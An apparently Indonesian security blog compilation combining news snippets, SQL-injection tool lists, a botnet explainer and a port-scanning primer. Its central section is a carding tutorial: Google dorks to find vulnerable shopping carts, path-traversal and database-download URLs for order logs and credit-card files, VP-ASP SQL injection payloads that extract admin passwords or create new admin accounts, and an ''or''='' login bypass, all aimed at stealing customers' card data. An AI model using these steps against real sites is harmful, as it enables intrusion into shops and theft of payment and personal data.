User seringkali tertipu dengan pop up windows yang menyatakan bahwa PC tersebut terinfeksi, bluscreen palsu, dan berbagai tipuan lainnya. Sehingga mereka tergoda untuk membeli produk antivirus yang sebenarnya merupakan program berbahaya, dan memberikan data pribadi mereka.
Diperkirakan oleh PandaLabs, pencipta program ini setiap bulannya meraup lebih dari €10 juta setiap bulan.

Sumber : detikinet.com

Contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

Contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

Contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format

http://www.xxxxx.com/cart32/

Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :

http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…

Contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

Sumber : http://www.indungg.com/

Tersangka diduga mencuri 50 juta data personal masyarakat Taiwan. Data orang penting yang berhasil dibobol termasuk informasi mengenai presiden Taiwan, Ma Ying-jeou, dan mantan presiden Chen Shui-bian.

Mereka kemudian menjual sebagian informasi pribadi tersebut seharga USD 10 per entri. Komplotan cracker yang berasal dari Taiwan dan China ini juga disinyalir mencuri uang dari rekening bank korban. Untuk mempertanggungjawabkan perbuatannya, para tersangka menghadapi ancaman hukuman sampai 5 tahun penjara.

Sumber : http://www.detikinet.com

“YOUR Box hacked BY ibh”, demikian sebaris pesan yang tertera pada halaman tersebut. Ibh sendiri merupakan kepanjangan dari Iran Black Hats Team. Berdasarkan sisa-sisa jejak yang ditinggalkan pelaku, terakhir kali situs Depperin diusili pada 22 Mei 2008. Jika memang benar demikian, maka sudah cukup lama pengelola situs Depperin tak menyadari kerentanan pada situsnya.

Sumber : http://jkt4.detikinet.com

The full documentation can be found in the tarball and also here, but here’s a list of what the Ninja does :

• Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
• Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)
• Privilege escalation to sysadmin group if ‘sa’ password has been found
• Creation of a custom xp_cmdshell if the original one has been removed
• Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
• TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
• Direct and reverse bindshell, both TCP and UDP
• DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
• Evasion techniques to confuse a few IDS/IPS/WAF
• Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection

Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on :

• Linux
• FreeBSD
• Mac OS X

• SQLIer – SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Download SQLIer
• SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Download SQLbftools
• SQL Injection Brute-forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Download SQLLibf
• SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Download SQLBrute
• BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Download BobCat
• SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Download SQLMap
• Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Download Absinthe
• SQL Injection Pen-testing Tool – The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Download SQL Injection Pen-testing tool
• SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Download SQID
• Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Download Blind SQL Injection Perl Tool
• SQL Power Injection Injector – SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Download SQL Power Injection
• FJ-Injector Framwork – FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Download FJ-Injector Framework
• SQLNinja – SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Download SQLNinja
• Automagic SQL Injector – The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Download Automagic SQL Injector
• NGSS SQL Injector – NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Download NGSS SQL Injector

Sumber : www.security-hacks.com

Distributed Denial-of-Service
Kadang komputer yang telah menjadi sebuah botnet digunakan untuk sebuah serangan Distributed Denial-of-Service (DDoS). Serangan DDoS adalah serangan pada sebuah system komputer atau jaringan yang menyebabkan hilangnya service pada user yang biasanya berupa hilangnya koneksi dari jaringan dan service dengan menghabiskan bandwidth jaringan korban atau overloading-nya sumberdaya (resource) sistem si korban. Botnet kebanyakan digunakan dalam skala besar dalam sebuah serangan. Bayangkan saja jika jumlahnya ribuan komputer bot yang menyerang system anda. Tiap bot akan membawa sebuah serangan DDoS melawan host yang lain. Kebanyakan juga menggunakan TCP SYN dan UDP flood attack untuk membanjiri sebuah host target.
Ada juga yang menggunakan botnet untuk menjalankan commercial DDoS attack pada lawan atau target yang dituju. Ada juga yang menggunakan botnet untuk mengirim bulk mail yang juga membawa serangan DDoS untuk melawan sebuah web server tertentu.
Sebagai catatan bahwa serangan DDoS attacks tidak dibatasi pada web server saja, secara logika bahwa semua service yang tersedia dalam Internet dapat menjadi target sebuah serangan. Higher-level protocol dapat digunakan untuk menambah pay load, bahkan serangan akan lebih efektif seperti dengan menjalankan exhausting search queries dalam bulletin board atau recursive HTTP-flood dalam website korban.
Recursive HTTP-flood berarti bot akan mulai dari sebuah link HTTP dan akan diikuti dengan seluruh link yang ada pada website korban. Cara ini biasa juga disebut dengan spidering.

Spamming
Beberapa bot menawarkan banyak kemungkinan untuk membuka proky SOCKS v4/v5 yaitu sebuah protocol proxy untuk TCP/IP. Setelah mengaktifkan proxy SOCKS, kemudian akan digunakan untuk menjalankan berbagai keperluan seperti spamming. Dengan bantuan sebuah botnet dan jutaan bot tersebut, seorang penyerang akan dapat mengirimkan bulk email (spam) secara besar-besaran. Beberapa bot juga mengimplementasikan sebuah fungsi spesial untuk mengambil alamat email. Kadang email spam yang anda terima you dikirim dari alamat email teman anda atau bias juga menggunakan proxy teman anda yang telah terinfeksi.

Sniffing Traffic
Bot juga dapat menggunakan sebuah paket sniffer untuk melihat text data menarik yang lewat dalam sebuah komputer. Biasanya informasi yang berguna yang akan diambil dalam sebuah komputer yang telah terinfeksi seperti username dan password.
Dan masih banyak lagi kegunaan dari botnet yang dapat digunakan seperti : Keylogging, menyebarkan malware, menyerang jaringan chat IRC, Manipulasi poling atau game online, pencurian identitas secara besar besaran dan lain sebagainya.

Beberapa jenis botnet adalah :

• Agobot/Phatbot/Forbot/XtremBot
• SDBot/RBot/UrBot/UrXBot/…
• mIRC-based Bots – GT-Bots
• DSNX Bots
• Q8 Bots
• Kaiten
• Perl-based bots
• dan masih banyak lagi yang lain

Port scanning software, in its most basic state, simply sends out a request to connect to the target computer on each port sequentially and makes a note of which ports responded or seem open to more in-depth probing. If the port scan is being done with malicious intent, the intruder would generally prefer to go undetected. Network security applications can be configured to alert administrators if they detect connection requests across a broad range of ports from a single host. To get around this the intruder can do the port scan in strobe or stealth mode. Strobing limits the ports to a smaller target set rather than blanket scanning all 65536 ports. Stealth scanning uses techniques such as slowing the scan. By scanning the ports over a much longer period of time you reduce the chance that the target will trigger an alert.

By setting different TCP flags or sending different types of TCP packets the port scan can generate different results or locate open ports in different ways. A SYN scan will tell the port scanner which ports are listening and which are not depending on the type of response generated. A FIN scan will generate a response from closed ports- but ports that are open and listening will not send a response, so the port scanner will be able to determine which ports are open and which are not.

There are a number of different methods to perform the actual port scans as well as tricks to hide the true source of port scan. You can read more about some of these by visiting these web sites: Port Scanning or Network Probes Explained.

It is possible to monitor your network for port scans. The trick, as with most things in information security, is to find the right balance between network performance and network safety. You could monitor for SYN scans by logging any attempt to send a SYN packet to a port that isn’t open or listening. However, rather than being alerted every time a single attempt occurs- and possibly being awakened in the middle of the night for an otherwise innocent mistake- you should decide on thresholds to trigger the alert. For instance you might say that if there are more than 10 SYN packet attempts to non-listening ports in a given minute that an alert should be triggered. You could design filters and traps to detect a variety of port scan methods- watching for a spike in FIN packets or just an anomylous number of connection attempts to a variety of ports and / or IP addresses from a single IP source.

To help ensure that your network is protected and secure you may wish to perform your own port scans. A MAJOR caveat here is to ensure you have the approval of all the powers that be before embarking on this project lest you find yourself on the wrong side of the law. To get accurate results it may be best to perform the port scan from a remote location using non-company equipment and a different ISP. Using software such as NMap you can scan a range of IP addresses and ports and find out what an attacker would see if they were to port scan your network. NMap in particular allows you to control almost every aspect of the scan and perform various types of port scans to fit your needs.

Once you find out what ports respond as being open by port scanning your own network you can begin to work on determining whether its actually necessary for those ports to be accessible from outside your network. If they’re not necessary you should shut them down or block them. If they are necessary, you can begin to research what sorts of vulnerabilities and exploits your network is open to by having these ports accessible and work to apply the appropriate patches or mitigation to protect your network as much as possible.

Freeware Port Scanners :

• NMap
• Foundstone Vision
• Portscan 2000

Sumber : http://netsecurity.about.com

Perbedaan XSS dan Script-Injection :
1. Script injection ialah suatu remote injeksi script untuk memodifikasi sebuah website.
2. Cross-Site Scripting tidak permanen melainkan temporary.

Type script yang dapat menginjeksi ke remote website/server antara lain adalah :
1. HTML
2. JavaScript
3. VBScript
4. ActiveX
5. Flash